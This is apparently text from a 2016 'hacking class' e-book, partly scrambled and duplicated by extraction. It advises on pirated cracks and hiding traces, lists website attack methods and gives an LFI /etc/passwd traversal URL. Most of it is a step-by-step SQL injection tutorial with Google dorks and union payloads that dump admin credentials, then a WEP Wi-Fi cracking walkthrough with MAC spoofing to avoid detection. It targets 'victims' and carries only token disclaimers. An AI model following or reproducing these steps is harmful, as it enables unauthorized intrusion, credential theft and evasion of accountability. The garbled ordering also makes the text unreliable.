Just do the following three things rest is being cared by your antivirus.Downloading things from Unknown Sites Solution: copyright © 2016 EAPL 42 .http://www. 2. 3. Most important one Always scan the Pen drive or External hard drives after connecting them. 3. 1. 2. No Trojan can attack you. Now your following problems are being solved: 1. 2.filehippo. Before downloading any Crack and Keygen ..com/download_spyware_terminator/ Install spyware terminator with web security tool bar . Turn of Computer Browser service: To do it Go to Start Menu–> RUN–>type services.msc and press enter–>then Find Computer Browser service and disable it and restart your system. Go to the Website: . Solution for Cracked version Software’s: As I have mentioned earlier never download cracks and keygens directly to you system but several other methods are there while you are searching for Crack or Keygen first try to search for Serial Key if you found it then its awesome and if not what to do. Now copy the download link of the Keygen or crack in the URL box provided on website this website contains all the world famous antiviruses and it will scan file for you if it contains any virus just ignore that otherwise have fun with crack or Keygen. Pen drive or USB drive solution: How you can protect your system from being infected from the pen drive. Protection from Malicious websites and much more. 4.msc and press enter–>User Configuration–>Administrative templates–>System–>Turn off Autoplay–> click on enable and then select all drives. Turn off Auto Play Devices: To do it Go to Start Menu–> RUN–>type gpedit.

Also It will give you more knowledge about handling the viruses and other situations like when something wrong is done what i have to do. 5. So guys get ready for first part of Hacking websites class…. Don’t worry i will also tell you how to protect your websites from these attacks and other methods like hardening of SQL and hardening of web servers and key knowledge about CHMOD rights that what thing should be give what rights… Note : This post is only for Educational Purpose only.e Method to use or test Hack tools.The solution of this problem is already provided Web browser Security toolbar will help you in surfing only secured and genuine websites and if you want to visit and download Virus Total will help you to identify the file whether its infected or not. So avoid them if you are too curious like me. welcome back to hacking class. Install Virtual Box and over virtual box install another Windows and test all hack tools using virtual windows. 1. For Some more security Tips you can also read my previous article: HACKING WEB SERVER Hello friends . This is the first part of the class “How to hack a website or Websites database” and in this i will introduce all website hacking methods. This will protect your system from being infected. 3. Then there are several ways to Handle it. 2. copyright © 2016 EAPL 43 . Why I have mentioned this is simply because Hackers always take benefit of these noobish tricks that they attach viruses with files and name them as hack tools . Now for Hacker like me i. today i will explain all the methods that are being used to hack a website or websites database. Create two to three fake email ID’s and use them for testing Keyloggers and other fake email hacking software’s. Today I will give you the overview and in later classes we will discuss them one by one with practical examples. Use Deep Freeze on C drive: For testing Hack tools always use deep freeze as after the next restart your system will be at same position as it was previous.

But you need atleast basic knowledge of following things. Basics of HTML.PHP and javascript. PHP. 1. Basic knowledge of Javascript. Now First two things you can learn from a very famous website for basics of Website design with basics of HTML.What are basic things you should know before website hacking? First of all everything is optional as i will start from very scratch. http://www. And most important expertize in removing traces otherwise u have to suffer consequences. Basic knowledge of servers that how servers work.. For this you can refer to first 5 hacking classes and specially read these two… 1. SQL.com/ And for the fourth point that you should be expert in removing traces . copyright © 2016 EAPL 44 . 3. 4. Hiding Yourself from being traced.w3schools.SQL. 2.

But you need atleast basic knowledge of following things. 3. Removing your Traces As we know traces are very important. METHODS OF HACKING WEBSITE: 1. DDOS ATTACK 6. so please take care of this step. CROSS SITE SCRIPTING 3.2. Basics of HTML. copyright © 2016 EAPL 45 . the malicious code is executed. REMOTE FILE INCLUSION 4. Basic knowledge of servers that how servers work. SQL. LOCAL FILE INCLUSION 5. What are basic things you should know before website hacking? First of all everything is optional as i will start from very scratch. Please don’t ignore them otherwise you can be in big trouble for simply doing nothing. When the stored strings are subsequently concatenated into a dynamic SQL command. 1. PHP. EXPLOITING VULNERABILITY. SQL INJECTION First of all what is SQL injection? SQL injection is a type of security exploit or loophole in which a attacker “injects” SQL code through a web form or manipulate the URL’s based on SQL parameters. The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed. 1. It exploits web applications that use client supplied SQL queries.. SQL INJECTION 2. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. Basic knowledge of Javascript. 2.

2. The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed. REMOTE FILE INCLUSION 4. SQL INJECTION 2. EXPLOITING VULNERABILITY. the malicious code is executed. XSS attacks copyright © 2016 EAPL 46 .com/ And for the fourth point that you should be expert in removing traces . which causes the application to do something it wasn’t intended to do. It exploits web applications that use client supplied SQL queries. When the stored strings are subsequently concatenated into a dynamic SQL command. 2. CROSS SITE SCRIPTING 3. DDOS ATTACK 6. CROSS SITE SCRIPTING Cross site scripting (XSS) occurs when a user inputs malicious data into a website. Hiding Yourself from being traced. so please take care of this step. SQL INJECTION First of all what is SQL injection? SQL injection is a type of security exploit or loophole in which a attacker “injects” SQL code through a web form or manipulate the URL’s based on SQL parameters. Removing your Traces As we know traces are very important. For this you can refer to first 5 hacking classes and specially read these two… 1. Now First two things you can learn from a very famous website for basics of Website design with basics of HTML. LOCAL FILE INCLUSION 5.4. http://www. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. And most important expertize in removing traces otherwise u have to suffer consequences.SQL. Please don’t ignore them otherwise you can be in big trouble for simply doing nothing. 1.w3schools. METHODS OF HACKING WEBSITE: 1.PHP and javascript.

.target-site. By finding ways of injecting malicious scripts into web pages.are very popular and some of the biggest websites have been affected by them including the FBI./. Microsft. Cross-site scripting attacks are therefore a special case of code injection. This file contains the user information of a Linux system./. is included into a website which allows the hacker to execute server side commands as the current logged on user. and AOL. DDOS ATTACK copyright © 2016 EAPL 47 ../. One of the most common uses of LFI is to discover the /etc/passwd file. www. So keep reading. LOCAL FILE INCLUSION Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory transversal. CNN../. and a variety of other information maintained by the browser on behalf of the user... session cookies.php?p=about. 3. I will explain this in detail in later hacking classes.  Denial of Service (DoS)  Data Theft/Manipulation 4./etc/passwd I will explain it in detail with practical websites example in latter sequential classes on Website Hacking. Hackers find sites vulnerable to LFI the same way I discussed for RFI’s. an attacker can gain elevated access privileges to sensitive page content. usually a shell (a graphical interface for browsing remote files and running your own code on a server)./. Remote File Inclusion (RFI) occurs when a remote file... With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system. RFI can lead to following serious things on website :  Code execution on the web server  Code execution on the client-side such as Javascript which can lead to other attacks such as cross site scripting (XSS). Apple. by means of directory transversal he would try to browse to the /etc/passwd file: www. Let’s say a hacker found a vulnerable site.. Ebay. and have access to files on the server.target-site. 5.com/index.com/index./. Some website features commonly vulnerable to XSS attacks are: • Search Engines • Login Forms • Comment Fields Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. REMOTE FILE INCLUSION Remote file inclusion is the most often found vulnerability on the website.php?p= .

Please Don’t misuse it. A denial-of-service attack (DoS attack) ordistributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. motives for.Its copyright © 2016 EAPL 48 .EXPLOTING VULNERABILITY Its not a new category it comprises of above five categories but i mentioned it separately because there are several exploits which cannot be covered in the above five categories. Let’s today start with the first topic Hacking Websites using SQL injection tutorial. If you have missed the previous hacking class don’t worry read it here. So i will explain them individually with examples. For more detailed hack on DDOS visit: 6. The basic idea behind this is that find the vulnerability in the website and exploit it to get the admin or moderator privileges so that you can manipulate the things easily. Isoftdl and me are not responsible of any misuse done by you. MySQL database is very common database system these days that websites use and you will surprise with the fact that its the most vulnerable database system ever. temporarily or indefinitely. it generally consists of the concerted efforts of a person or people to prevent an Internet site or service from functioning efficiently or at all. Note: This article is for Educational Purposes only. First of all. Although the means to carry out. there i explained the various topics that we will cover in hacking classes. So guys let’s start our tutorial of Hacking Websites using SQL injection technique. i will provide you the brief introduction about SQL injection. and targets of a DoS attack may vary. In DDOS attack we consumes the bandwidth and resources of any website and make it unavailable to its legitimate users. SQL INJECTION Hello friends in my previous class of How to hack websites.Simply called distributed denial of service attack.

Hacking Websites using SQL Injection STEPS TO HACK WEBSITES USING SQL INJECTION 1..e the vulnerability points of the websites. Here we will discuss how to exploit those vulnerabilities manually without any tool. Below is example of some queries. Some Google Searches can be awesomely utilized to find out vulnerable Websites. Examples: Open the Google and copy paste these queries… inurl:index..has unlimited loopholes and fixing them is a very tedious task.php?id= copyright © 2016 EAPL 49 . Finding the target and vulnerable websites First of all we must find out our target website. I have collected a lot of dorks i.php?id= inurl:trainers.

inurl:buy.php?id= inurl:page.php?id= inurl:gallery. We can discuss them in comments of this posts so keep posting and reading there. Checking for Vulnerability on the website Suppose we have website like this:- copyright © 2016 EAPL 50 . 2.php?category= inurl:article.php?id= inurl:declaration_more. I cannot put them on my website as they are too critical to discuss.php?id= Search google for more google dorks to hack websites.php?decl_id= inurl:pageid= inurl:games.php?file= inurl:newsDetail.php?ID= inurl:play_old.

php?id=5 order by 1/* –> no error h**p://www.php?id=5 order by 3/* –> no error h**p://www. h**p://www.site. that means the target website is vulnerable to sql injection and you can hack it.site.h**p://www. 3).com/products.com/products.site.site.php?id=5 order by 4/* –> Error (we get message like this Unknown column ‘4’ in ‘order clause’ or something like that) copyright © 2016 EAPL 51 .com/products. we add a quote to it ‘ h**p://www.com/products. if we get an error like this: “You have an error in your SQL syntax. check the manual that corresponds to your MySQL server version for the right etc…”Or something like that.site.com/products.php?id=7 To test this URL. Find the number of columns To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error.php?id=7’ On executing it.com/products.php?id=5 order by 2/* –> no error h**p://www.site.

5).com/products.1. then try — it’s a comment and it’s important for our query to work properly.2.php?id=5 union all select 1. ) if we see some numbers on screen.e 1 or 2 or 3 then the UNION works . Check for MySQL version h**p://www. it should look like this copyright © 2016 EAPL 52 .php?id=5 union all select 1.33log or 5. Let say that we have number 2 on the screen. cause we got an error on 4.3/* NOTE: if /* not working or you get some error. i.45 or similar.that means that the it has 3 columns. Check for UNION function With union we can select more data in one sql statement. So we have h**p://www.com/products. now to check for version we replace the number 2 with @@version or version() and get someting like 4.2.site.0. 4).site.3/* (we already found that number of columns are 3 in section 2).

site. What we need is convert() function i. usr. 6).e.@@version. pass. 4.1.h**p://www. password.1.php?id=5 union all select 1.com/products.3/* and you will get MySQL version . Getting table and column name Well if the MySQL version is less than 5 (i.unhex(hex(@@version)).com/products.convert(@@version using latin1).e 4.site.site. h**p://www.3/* or with hex() and unhex() i.com/products. user_name.33. user.12…) <— later i will describe for MySQL greater than 5 version. we must guess table and column name in most cases. common table names are: user/s. pwd etc… i. passwd. member/s … common column names are: username. admin/s.e. h**p://www. so i must write it .3/* If you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …” I didn’t see any paper covering this problem.php?id=5 union all select 1.php?id=5 union all select 1.e would be copyright © 2016 EAPL 53 .

3 from admin/* Note that i put 0x3a.3 from admin/* (we see number 2 on the screen like before. mysql hash. example would be admin. it depends of how the database is set up i.site. and that’s good ) We know that table admin exists… Now to check column names.concat(username. h**p://www.3 from admin/* (if you get an error.password.site.site.com/products.com/products.password).php?id=5 union all select 1.3 from admin/* (if you get an error.h**p://www. or superadmin etc… now to check if column password exists h**p://www.php?id=5 union all select 1.site. then try the other column name) we seen password on the screen in hash or plain-text.com/products. sha1… Now we must complete query to look nice For that we can use concat() function (it joins strings) i.php?id=5 union all select 1.e h**p://www. then try the other column name) we get username displayed on screen.0x3a. its hex value for : (so 0x3a is hex value for colon) copyright © 2016 EAPL 54 .username.e md5 hash.com/products.2.php?id=5 union all select 1.

(there is another way for that.concat(username.0x3a.site.e admin:admin or admin:somehash When you have this.table_name.3 from information_schema.3 from admin/* Now we get displayed username:password on screen.e h**p://www.site.com/products.concat(user.3 from mysql.php?id=5 union all select 1. To get tables we use table_name and information_schema. i. It holds all tables and columns in database.password). ascii value for : ) h**p://www.tables/* copyright © 2016 EAPL 55 .php?id=5 union all select 1.php?id=5 union all select 1.user (default) It has user password columns.com/products.char(58). MySQL 5 Like i said before i’m gonna explain how to get table and column names in MySQL greater than 5.site. you can login like admin or some superuser. If can’t guess the right table name. char(58).password).tables. you can always try mysql.com/products. so example would be h**p://www. i. For this we need information_schema.user/* 7).

1 to limit 1.1/* the second table is displayed.php?id=5 union all select 1.3 from information_schema.php?id=5 union all select 1.Here we replace the our number 2 with table_name to get the first table from information_schema. for third table we put limit 2. auth. we change limit 0.tables limit 1.tables limit 0.1/* note that i put 0.3 from information_schema.1 (get 1 result starting from the 0th) now to view the second table.table_name.1/* Keep incrementing until you get some useful like db_admin.table_name. auth_user etc… To get the column names the method is the same.tables displayed on the screen.site.site.1 i.php?id=5 union all select 1.com/products. poll_user.e h**p://www.com/products.1 i.3 from information_schema. copyright © 2016 EAPL 56 .e h**p://www. Now we must add LIMIT to the end of query to list out all tables.e h**p://www. i.table_name.com/products.site.tables limit 2.

Note that this won’t work if the magic quotes is ON. Let’s say that we found colums user. h**p://www. so keep incrementing until you get something like username. copyright © 2016 EAPL 57 .com/products.site.e h**p://www. password.column_name.php?id=5 union all select 1.1 to limit 1.login.php?id=5 union all select 1.columns limit 0.1) ie.1/* The second column is displayed.1/* The first column is diplayed.columns limit 1.columns where table_name=’users’/* Now we get displayed column name in table users.site.Here we use column_name and information_schema. The second one (we change limit 0.user.com/products. (where clause) Let’s say that we found table users.column_name.column_name. i. passwd etc… If you wanna display column names for specific table use this query.3 from information_schema. pass and email.php?id=5 union all select 1. pass. Just using LIMIT we can list all columns in table users.3 from information_schema.com/products.site.columns the method is same as above so example would be h**p://www.3 from information_schema.

site.co.pass.Now to complete query to put them all together.md5decrypter.0x3a.concat(user. For Cracking the MD5 hash values you can use this : 1) Check the net whether this hash is cracked before: Download: http://www. i decribe it earlier.php?id=5 union all select 1.com But the passwords are in hash format so we need to crack the hash. Note 90% of hash are crackable but 10% are still there which are unable to crack.email) from users/ What we get here is user:pass:email from table users.com/products. i.0x3a. So don’t feel bad if some hash doesn’t crack.uk 2) Crack the password with the help of a site: Download:: copyright © 2016 EAPL 58 .e h**p://www. Example: admin:hash:whatever@blabla. For that we use concat() .

milw0rm. SCAN TO GET THE VICTIM Get the victim to attack that is whose password you want to hack or crack.rar Password = OwlsNest STEPS TO HACK WIFI OR WIRELESS PASSWORD 1. To do it so type airmon-ng You will see the name of your wireless card.com/files/13696796…CF_2.10_2b. Backtrack Linux Live CD(best Linux available for hackers with more than 2000 hacking tools inbuilt). Now type airmon-ng stop ath0 then type: copyright © 2016 EAPL 59 . Now Enter the Backtrack Linux CD into your CD drive and start it. replace “ath0” with the name of your card.php or http://passcracking.com/cracker/insert. Once its started click on the black box in the lower left corner to load up a “KONSOLE” . Download Backtrack Linux Live CD from here: CLICK HERE 2. (mine is named “ath0”) From here on out.com/index.php 3) Use a MD5 cracking software: Download: http://rapidshare.http://www. Now you should start your Wifi card. Get the Backtrack-Linux CD.

ifconfig wifi0 down then type: macchanger –mac 00:11:22:33:44:55 wifi0 then type: airmon-ng start wifi0 The above steps i have explained is to spoof yourself from being traced. Now type: airodump-ng ath0 All above steps in one screen shot: copyright © 2016 EAPL 60 . In above step we are spoofing our MAC address. this will keep us undiscovered.

Some will have a better signal than others and its always a good idea to pick one that has a best signal strength otherwise it will take huge time to crack or hack the password or you may not be able to crack it at all. now select the network you want to hack. Once you see the networks list.Now you will see a list of wireless networks in the Konsole. To freeze the airodump screen HOLD the CNTRL key and Press C. Now you will see something like this: copyright © 2016 EAPL 61 .

copyright © 2016 EAPL 62 . If it says WPA or any variation of WPA then move on…you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.3. SELECTING NETWORK FOR HACKING Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP.

As shown in this figure: copyright © 2016 EAPL 63 . take note of its channel number and bssid. The bssid will look something like this — 00:23:69:bb:2d:of The Channel number will be under a heading that says “CH”.Once you’ve decided on a network.

you must have different file names for each one or it won’t work.” Once you gain a minimum of 5. You will also see a heading marked “IV” with a number underneath it.000. Once you typed in that last command. You don’t even put in an extension…just pick a random word that you will remember. It just depends on how long and difficult they made the password. the screen of airodump will change and start to show your computer gathering packets. I’ve cracked some right at 5. Cracking the WEP password copyright © 2016 EAPL 64 . 4.000 of these IV’s. I usually name them as ben1. ben2 etc.000 and others have taken over 60. I usually make mine “Ben” because I can always remember it. More difficult is password more packets you will need to crack it. This stands for “Initialization Vector” but in general terms all this means is “packets of info that contain characters of the password. This file is the place where airodump is going to store the packets of info that you receive to later crack. you can try to crack the password. Its simply because i love ben10….Now in the same KONSOLE window type: airodump-ng -c (channel) -w (file name) –bssid (bssid) ath0 The file name can be whatever you want.hhahahahaha :D Note: If you want to crack more than one network in the same session.

000 IV’s before it will crack. This will be where we actually crack the password.000 then you can start your password crack.000. switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. When it finally does happen. So for me. Retry at 10. Don’t put a space in between it and -01. If this is the case. Now you need to open up a 3rd and final Konsole window. aircrack will test what you’ve got so far and then it will say something like “not enough IV’s. typically you have to wait for more like 10. Type it as you see it. then good! You are almost there.Now leave this Konsole window up and running and open up a 2nd Konsole window. It will probably take more than this but I always start my password cracking at 5. In this window type: aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0 This will send some commands to the router that basically it is to associate your computer even though you are not officially connected with the password. you should see about 4 lines of text print out with the last one saying something similar to “Association Successful :-)” If this happens.cap Remember the file name you made up earlier? Mine was “Ben”.000 to 20. Now you just sit and wait. Sometimes this starts to happen within seconds…sometimes you have to wait up to a few minutes. I would type wepkey01. it will send it back to the router and begin to generate hundreds of ARP and ACK per second.cap Once you have done this you will see aircrack fire up and begin to crack the password.000 just in case they have a really weak password. Now type: aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0 This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Now type: aircrack-ng -b (bssid) (filename)-01. Don’t worry about what these mean…just know that these are your meal tickets.” copyright © 2016 EAPL 65 . This is great! It means you are almost finished! When this number reaches AT LEAST 5. Once your computer finally gathers an ARP request. If this command is successful. Just be patient.cap here.

Take note. before too long you will have the password! now if the password looks goofy. Retry at 15. So for instance if the password was “secret”.000 mark it will automatically fire up again and try to crack it. that the password will always be displayed in aircrack with a colon after every 2 characters. it would be displayed as: se:cr:et This would obviously be the ASCII format. in which case. Sometimes. If this fails it will say “not enough IV’s. though.DON’T DO ANYTHING! It will stay running…it is just letting you know that it is on pause until more IV’s are gathered.000. Once you pass the 10.” and so on until it finally gets it. it will still work. aircrack will show you exactly what characters they typed in for their password. It doesn’t matter either way. dont worry. some passwords are saved in ASCII format. because you can type in either one and it will connect you to the network. If you do everything correctly up to this point. If it was a HEX encrypted password that was something like “0FKW9427VF” then it would still display as: 0F:KW:94:27:VF copyright © 2016 EAPL 66 . the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. though.

Just omit the colons from the password. I am not responsible for what you do with this information. but after a few successful attempts. copyright © 2016 EAPL 67 . If I am near a WEP encrypted router with a good signal. falls completely on you because…technically…this is just for you to test the security of your own network. I can often crack the password in just a couple of minutes. I hope you all liked it. Any malicious/illegal activity that you do. you will get very quick with it. If you have any queries then ask me…. try to connect to the network and type in the password without the colons and presto! You are in! It may seem like a lot to deal with if you have never done it. boot back into whatever operating system you use.